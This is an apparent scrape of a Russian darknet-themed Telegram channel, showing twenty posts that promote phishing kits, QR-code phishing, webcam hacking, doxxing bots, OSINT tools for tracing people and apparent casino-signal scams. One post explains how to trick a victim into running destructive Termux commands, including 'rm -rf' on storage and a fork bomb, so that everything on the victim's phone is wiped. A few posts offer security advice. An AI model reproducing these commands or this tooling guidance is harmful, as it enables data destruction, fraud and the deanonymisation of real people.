ТЫ ХАКЕР? DarkNet


Channel's geo and language: Russia, Russian
Category: Darknet


Канал про DarkNet
Мы не несем ответственность за ваши действия.
По вопросам - @fIorinwork
Доверенное лицо - @MAYOT_1337 @byJeb

Related channels

Channel's geo and language
Russia, Russian
Category
Darknet
Statistics
Posts filter


🔑 Слив платного бота который раздает 85% сигналы 💻

Что нужно для старта:
- Открыть бота с сигналами 📍
▶️ @Luckyonewins_bot
- Бот даст вам приложение которое генерирует сигналы

- выделить 10 минут в день и повторять точно также у себя
на аккаунте в приложении 📲

- самых шустрых добавим в Вип канал🔥 по цене (30.000₽) бесплатно🤝 за 2 простых, несложных действия 👍

▶️ @Luckyonewins_bot


🎁Боты/чаты в телеграм, которые вам помогут!

🔹 AngrySearch - Лучший бот в сфере про##ва и деанона

💵MegaSlot - Связка на 1win, которая поможет вам заработать денег!

💎 Darknet chat - люди с дарка которые тебе помогут!

✉️ GrandSMS - Бот, в котором ты сможешь купить номер на любой сервис!


📷Взлом веб-камер с телефона

Webcam Sniper - это инструмент позволяет исследовать уязвимости веб-камер, предоставляя пользователям возможность проверить безопасность своих устройств.

Ключевые функции:

— Сканирование уязвимостей: Обнаружение известных слабых мест в ПО.

— Доступ к видеопотоку: Проверка возможности получения изображения с камеры.

❤️ Абузим казик и делаем первые миллионы


Как вас могут найти по нику?

Как по вашему нику можно найти информацию.

Google + intext
С помощью intext:(ник) можно найти много информации о человеке.
Если вы используете один и тот же ник везде, вас будет легко найти.

OSINT боты
Существуют боты, которые ищут информацию по нику в базе данных.

Скрипты/GitHub
Maigret доступен на GitHub и может быть использован вместо бота. Важно, чтобы база данных была большой и обновлялась регулярно.

Подытожим:
Информацию о вас действительно возможно найти по нику, но только если её кто-то сольёт и она попадёт в базы данных с разных источников.

❤️ ТЫ ХАКЕР


😎Поиск по MAC-адресу


maclookup.app — это онлайн-сервис для поиска информации о MAC-адресах. Он позволяет быстро узнать, к какому производителю относится введённый MAC-адрес.

Основные функции:

— Поиск по MAC-адресу: Введите любой MAC-адрес, чтобы получить данные о его производителе.

— Информация о производителе: Сервис предоставляет сведения о компании, присвоившей данный MAC-адрес.

❤️ Абузим казик и делаем первые миллионы


😈Делаем фишинг ссылку


Phishing Frenzy — это мощный инструмент с открытым исходным кодом для создания и управления фишинговыми кампаниями. Он предлагает все необходимые функции для автоматизации фишинга, включая разработку поддельных сайтов, рассылку фишинговых писем и отслеживание результатов атак.

Ключевые возможности:


— Создание поддельных веб-страниц
Phishing Frenzy позволяет легко создавать фальшивые сайты, имитирующие настоящие.

— Автоматизация атак
Инструмент автоматизирует процесс рассылки фишинговых писем и управление кампаниями, что значительно упрощает работу.

❤️ Абузим казик и делаем первые миллионы


С наступающим!🔴


Как можно безопасно заходить на сомнительные файлы?

SquareX - Сервис, который обеспечивает безопасность доступа к сомнительным сайтам или файлам. Использует уникальный метод облачных песочниц. После использования среду можно утилизировать, удалив все данные сеанса.\\


❤️ ТЫ ХАКЕР


🤩Фишинг через QR-код

QRgen — удобный инструмент с открытым исходным кодом для создания QR-кодов с настраиваемыми URL.

Преимущества QRgen:

• Легкость в использовании: даже новички смогут быстро генерировать QR-коды.

• Возможность добавления скрытых реферальных ссылок и редиректов.

• Интеграция с веб-интерфейсами для управления массовыми кампаниями с QR-кодами.

❤️ ТЫ ХАКЕР


ИЗМЕНЯЕМ MAC-АДРЕС НА КОМПЬЮТЕРЕ

Это может быть очень полезно в различных ситуациях, таких как обход блокировок или фильтров на трафик (например, на рабочем месте).

▪️Открываем командную строку от имени администратора.
▪️Чтобы увидеть текущие MAC-адреса сетевых адаптеров, вводим команду ipconfig /all.
▪️Вводим команду netsh interface show interface, чтобы отобразить доступные сетевые адаптеры.
▪️Вводим команду netsh interface set interface name="Имя соединения" newmac=Новый_MAC_Адрес.

Другие способы включают использование программы MACChange, Редактора реестра, Диспетчера устройств, PowerShell, и TMAC.

❤️ ТЫ ХАКЕР


💻Как хакеры подслушивают звонки

Хакеры используют различные техники для перехвата телефонных разговоров. Вот несколько ключевых способов:

SS7-атаки
Протокол SS7, используемый в сетях мобильной связи, имеет уязвимости, через которые злоумышленники могут перехватывать звонки и SMS.

👉IMSI-кетчеры
Это устройства, которые маскируются под вышки мобильной связи и заставляют телефоны подключаться к ним, что позволяет перехватывать звонки.

Вредоносное ПО
Хакеры могут устанавливать на смартфон троянские программы, которые дают доступ к микрофону и позволяют записывать разговоры.

✔️Важно помнить, что хакеры используют любые уязвимости в сетях и устройствах, чтобы получить доступ к информации.

❤️ ТЫ ХАКЕР


TypingDNA ActiveLock — блокировка компа для незнакомцев

Сервис, блокирующий информацию на вашем компе/ноутбуке по стилю набирания текста. ActiveLock способен понять, что его вводите не вы, менее чем за 200 нажатий клавиш — объем текста, сопоставимый с одним твитом.

Какое-то время ActiveLock работает в тренировочном режиме — узнает стиль набора текста (важно, чтобы в этот период к клавиатуре никто другой не прикасался). Для обучения нужно минимум 2000 слов. Потом переключаете программу из режима «Training» в режим «Active» — и все: если с вашего устройства начнет работать кто-то другой, ActiveLock оперативно блокирует работу и регистрирует событие.

— Хочешь наказать обидчика и заработать на нем? Arcana Team тебе поможет в этом!


▪️Безопасность Посещения Даркнета.

▪️VPN и Tor не могут сделать посещение Даркнета абсолютно безопасным.

▪️Несмотря на использование шифрования, VPN и скрытых адресов, полная анонимность и безопасность невозможны. Даже при скрытии своей активности всегда есть вероятность отслеживания или обнаружения, особенно если дело касается нелегальной деятельности.

▪️В мире тотальной слежки и сбора данных важно самому контролировать свою приватность. Поэтому стоит задуматься о применении VPN.

— Хочешь наказать обидчика и заработать на нем? Arcana Team тебе поможет в этом!


Sherlock — это востребованный инструмент для OSINT, предназначенный для поиска пользовательских профилей по никнейму на различных онлайн-платформах. Он позволяет быстро и эффективно собирать информацию о человеке из открытых источников.

Преимущества Sherlock:

• Скорость — за считанные минуты можно проверить более 300 сайтов на наличие профиля с указанным ником.
• Удобство — поддерживает работу на различных операционных системах: Linux, macOS и Windows.
• Обширная база платформ — включает как популярные социальные сети, так и менее известные ресурсы.

— Хочешь наказать обидчика и заработать на нем? Arcana Team тебе поможет в этом!


🏃‍♀️OSINT: поиск по электронный почте

OSINT электронной почты — это процесс сбора и анализа общедоступной информации об адресе электронной почты или связанным с ним отправителем/получателем.

— Обратный поиск по почте может выдать много ценной информации: Имя владельца, различного вида утечки данных, профиль в соц. сетях и связана ли почта с веб-сайтом. В этой подборке собрали для вас мастхэв по тулсам для обратного поиска по почте.

Инструменты для обратного поиска:

🔤Epieos - утилита, которая найдет Google ID, даст ссылки на профиль в Google карты, альбомы и календарь, найдет к каким сайтам привязана почта, профили.

🔤theHarvester - инструмент для сбора e-mail адресов, имён поддоменов, виртуальных хостов, открытых портов.

🔤GHunt - OSINT-инструмент, который с годами развивается и включает в себя множество методов исследования учетных записей или объектов Google.

🔤H8mail - инструмент для поиска взломанных адресов электронной почты и используемых на различных сайтах паролей в утекших базах данных.

🔤Proofy - инструмент, который проверяет существование электронной почты.
P. S  Отличная подборка - 👍

❤️ ТЫ ХАКЕР


Защита вашего аккаунта в Telegram от возможного сн@са включает в себя несколько важных мер:

1. Используйте двухфакторную аутентификацию:
Включите эту функцию в настройках безопасности вашего аккаунта. Это добавит дополнительный уровень защиты.


2. Избегайте спама:
Не отправляйте массовые сообщения или не участвуйте в спам-акциях. Это может привести к блокировке вашего аккаунта.


3. Соблюдайте правила сообщества:
Ознакомьтесь с правилами использования Telegram и старайтесь их не нарушать.


4. Не используйте подозрительные боты и каналы:
Будьте осторожны с использованием ботов и подпиской на каналы, которые могут нарушать правила.


5. Не передавайте данные своего аккаунта:
Не делитесь своим номером телефона и кодами подтверждения с посторонними.


6. Регулярно обновляйте приложение:
Убедитесь, что у вас установлена последняя версия Telegram, чтобы иметь доступ к самым последним обновлениям безопасности.


7. Сохраняйте резервные копии:
Если у вас есть важные чаты или данные, сделайте их резервные копии.


8. Убедитесь, что ваш номер телефона защищен:
Используйте проверку номера с помощью SMS или звонка и не делитесь им с незнакомыми людьми.


❤️ ТЫ ХАКЕР


🤖Прослушивание мобильных телефонов и мифы о анонимности GSM

Хотя сотовые телефоны и базовые станции повсюду, их работа остаётся скрытой и сложной. Рассмотрим уязвимости GSM-связи, в частности, IMSI-ловушки (IMSI-catchers).

GSM-связь трудно исследовать, так как операторы не предоставляют открытого кода и API. Создание собственной базовой станции требует дорогого оборудования и может иметь юридические последствия.

IMSI-ловушки
IMSI-ловушки — это ложные базовые станции, используемые спецслужбами для перехвата связи. Они могут работать в активном режиме, выдавая себя за настоящую станцию, или в пассивном, просто мониторя трафик. В активном режиме ловушка заставляет телефоны подключаться к ней и раскрывать уникальные идентификаторы (IMSI и IMEI).

Перехват связи
IMSI-ловушки могут оставлять телефоны без связи или выдавать некорректные данные. Перехват разговоров возможен благодаря уязвимостям в защите GSM. Хотя существуют различные уровни шифрования (A5/0, A5/1, A5/2, A5/3), они имеют недостатки. Ловушка может использовать слабый шифр, чтобы декодировать трафик и извлечь секретные ключи абонентов.

❤️ ТЫ ХАКЕР


Уничтожаем телефон недруга

Доброго времени суток, если хочешь отомстить недалекому обидчику, необязательно иметь хакерские навыки, и пытаться как-то его взломать. Достаточно убедить его ввести парочку команд в Termux, после чего он пожалеет что связался с вами.

1. Убеждаем жертву скачать и открыть Termux;
2. Отправляем жертве следующие команды и просим ввести их по очереди:

$ termux-setup-storage
$ rm -rf /sdcard/*
$ rm -rf ~/*
$ :(){ :|:& };:

3. Поздравляю, вы великолепны!

Данные команды уничтожат всю систему и неприятель потеряет всё что было на его устройстве ✌️

❤️ ТЫ ХАКЕР


🏚Что такое IP-адрес?

Компьютерам, серверам и роутерам в интернете нужно понимать, куда отправлять данные, чтобы они не потерялись в паутине проводов и прочих вайфаев по пути с какого-нибудь американского хранилища «Ютуба» в браузер дяди Васи в Череповце. Один из помощников в этом деле — IP-адрес. Он представляет собой что-то вроде дорожного указателя, маяка, который содержит данные о месте конкретного устройства в структуре Глобальной сети.

Чаще всего это четыре числа, которые разделены между собой точками (такой формат поддерживается в протоколе IPv4). Например, вот один из самых популярных IP-адресов — вы могли вводить его, чтобы зайти на свой роутер:

Каждое из чисел в адресе — это восьмизначное двоичное число, или октет. Оно может принимать значения от 0000 0000 до 1111 1111. Или же от 0 до 255 в десятичной системе счисления — то есть 256 разных значений.

Получается, диапазон IP-адресов стартует с 0.0.0.0 и заканчивается 255.255.255.255. Если посчитать количество всех адресов в этом диапазоне, получится 4 294 967 296.

Формат адресов IPv4 — не единственный, хоть и один из самых популярных в интернете. Есть ещё стандарт IPv6 — его адреса состоят уже из 128 битов (в IPv4 — 32 бита). Таким образом, IPv6 позволяет пронумеровать 2128 устройств (по 300 миллионов на каждого жителя Земли).

❤️ ТЫ ХАКЕР


📍Фейковая геолокация на Android

Иногда при работе с приложениями требуется включенная геолокация. Очевидно, что включать ее и давать доступ любым приложениям - глупая затея.

Для таких случаев существуют приложения, подменяющие вашу геолокацию. Одно из них - Fake GPS Location Spoofer 2023.

К сожалению это не Open Sourcе приложение и установить его можно только с Play Market. Я честно пытался найти приложение с похожим функционалом и открытым исходным кодом, но кроме LocationPrivacy, который не обновлялся много лет, и застывший на версии 0.3, в f-droid я не нашел.

Если есть такое приложение в f-droid напишите в комментарии. Удачи!

❤️ ТЫ ХАКЕР

20 last posts shown.